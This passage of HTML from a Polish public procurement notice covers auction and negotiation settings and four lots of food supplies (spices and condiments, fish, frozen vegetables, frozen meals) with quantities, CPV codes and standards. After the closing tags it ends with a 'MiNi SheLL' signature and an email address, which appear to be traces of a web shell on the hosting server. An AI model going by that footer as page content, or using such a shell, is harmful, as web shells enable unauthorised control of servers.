                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa art. ogólnospożywczych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Pakiet I (przyprawy, koncentraty, sosy w proszku, wyroby sojowe):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Przyprawa uniwersalna typu kucharek
kg
60
15871270-7
PN-EN 13188
2.
Przyprawa pięciu smaków (do potraw chińskich)
kg
20
15871270-7
PN-EN 13188
3.
Przyprawa do gyrosa
kg
20
15871270-7
PN-EN 13188
4.
Bazylia
kg
4
15872000-1
PN-A-86960
5.
Cynamon
kg
10
15872000-1
BN-68/8132-09
6.
Czosnek granulowany
kg
40
15871000-4
PN-A-86967
7.
Koper suszony
kg
15
15871000-4
PN-A-86967
8.
Kwasek cytrynowy
kg
20
15890000-3
PN-81/A-79734
9.
Liść laurowy
kg
15
15871000-4
PN-R-87022
10.
Gałka muszkatołowa
kg
10
15872300-4
PN-A-86955:1:1997
11.
Ziele angielskie
kg
20
15870000-7
BN-648132-14
12.
Przyprawa goździki
kg
2
15870000-7
PN-A-86967
13.
Majeranek
kg
40
15872000-1
PN-A-86958
14.
Musztarda butelka lub słoik
kg
150
15871250-1
PN-A-86964
15.
Ocet
l
60
15871120-1
PN-72/A-79733
16.
Pieprz czarny mielony
kg
60
15872100-2
PN-A-86965
17.
Zioła prowansalskie
kg
10
15872000-1
PN-A-86960
18.
Papryka mielona ostra
kg
60
15871000-4
PN-A-86955
19.
Sól spożywcza
kg
1200
15872400-5
PN-C-84081-2
20.
Soda oczyszczona spożywcza
kg
10
15890000-3
PN-EN 13188
20.
Herbata granulowana
kg
400
15863000-5
PN-ISO 3720

21.
Przyprawa do zup w płynie
l
1800
15890000-3
PN-A-94052
22.
Oregano
kg
6
15872000-1
PN-A-86960
23.
Curry
kg
4
15871200-6
PN-R-87022
24.
Rosół drobiowy w proszku (baza)
kg
80
15891400-4
PN-A-97052
25.
Żurek w proszku (baza)
kg
80
15891400-4
PN-A-94050
26.
Sos pieczarkowy w proszku
kg
100
15871260-4
PN-A-86951
27.
Sos pieczeniowy ciemny w proszku
kg
60
15871260-4
PN-A-86951
28.
Zupa ogonowa w proszku
kg
60
15891400-4
PN-A-94050
29.
Barszcz biały w proszku
kg
60
15871260-4
PN-A-86951
30.
Barszcz czerwony w proszku
kg
60
15871260-4
PN-A-86951
31.
Sos boloński
kg
50
15871260-4
PN-A-86951
32.
Soja (granulat)
kg
300
15890000-3
PN-ISO 5506
33.
Soja (kostka 06)
kg
350
15890000-3
PN-ISO 5506
34.
Kotlety sojowe schabowe
kg
100
15890000-3
PN-ISO 5506
35.
Ketchup butelka lub słoik
kg
200
15871230-5
PN-A-82013:1996
36.
Majonez butelka lub słoik
kg
200
15871273-8
PN-A-86950:1995
37.
Chrzan słoik
kg
100
15331400-1
PN/R-75520
38.
Woda mineralna niegazowana 
(but. 1,5l)
l
9000
15981000-8
PN-Z-11001-2
39.
Koncentrat pomidorowy puszka 30%
kg
1500
15331427-6
PN-75/A-77601
40.
Szczaw (słoik) konserwowy
kg
200
15332170-6
PN-A-77807:1997
41.
Kukurydza konserwowa puszka lub słoik
kg
400
15331400-1
PN-A-77807
42.
Papryka konserwowa czerwona puszka lub słoik
kg
300
15331400-1
PN-PN/A-77806
43.
Groszek konserwowy puszka lub słoik
kg
300
15331400-1
PN-76/A-77803
44.
Fasola czerwona konserwowa słoik lub puszka
kg
150
15331400-1
PN-V-74016:2001



<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15871270-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa ryb<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Pakiet II (ryby):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Filet z morszczuka / mintaja / miruny / dorsza (mrożony, ze skórą, rozmiar 100  200 g) 
kg
900
15222000-0
PN-A-86759
2.
Kostka z fileta z mintaja / morszczuka (mrożona)
kg
700
15221000-3
PN-75/A-86764
3.
Burgery rybne panierowane o wadze 1 szt ok. 100g (mrożone)
kg
1000
15229000-9
PN-A-86769
4.
Płaty ze śledzia (mrożone)
kg
200
15221000-3
PN-A-86759
5.
Płaty śledziowe w salinacie
kg
300
15233000-0
PN-92/A-86758
6.
Makrela wędzona o wadze 1 szt ok. 200g (tusza)
kg
100
15234000-7
PN-85/A-86772
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15222000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawa warzyw mrożonych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Pakiet III (warzywa mrożone):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Mieszanka wieloskładnikowa mrożona
kg
800
15331170-9
PN-A-78602
2.
Mieszkanka 2-składnikowa marchew + groszek mrożona
kg
700
15331170-9
PN-A-78602
3.
Kalafior mrożony
kg
800
15331170-9
PN-A-78602
4.
Brokuł mrożony
kg
800
15331170-9
PN-A-78602
5.
Szpinak mrożony
kg
400
15331170-9
PN-A-78602
6.
Warzywa leczo mrożone
kg
300
15331170-9
PN-A-78602
7.
Pieczarki mrożone
kg
300
15331170-9
PN-A-78602
8.
Włoszczyzna w paski (bez warzyw kapustnych i strączkowych) mrożona
kg
700
15331170-9
PN-A-78602
9.
Mieszanka chińska mrożona
kg
300
15331170-9
PN-A-78602
10.
Mieszanka węgierska mrożona
kg
300
15331170-9
PN-A-78602
11.
Zupa grzybowa
kg
200
15331170-9
PN-A-78602
12.
Zupa barszcz ukraiński
kg
200
15331170-9
PN-A-78602
13.
Jagody mrożone
kg
200
15330000-0
PN-A-78652
14.
Truskawki mrożone
kg
400
15330000-0
PN-A-78652
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15331170-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Dostawa dań mrożonych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Pakiet IV (dania mrożone):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Uszka z kapustą i grzybami mrożone
kg
50
15851000-8
PN-A-82201
2.
Pierogi z serem mrożone
kg
300
15851000-8
PN-A-82201
3.
Pierogi ruskie
kg
200
15851000-8
PN-A-82201
4.
Knedle z truskawkami
kg
300
15851000-8
PN-A-82201
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15851000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com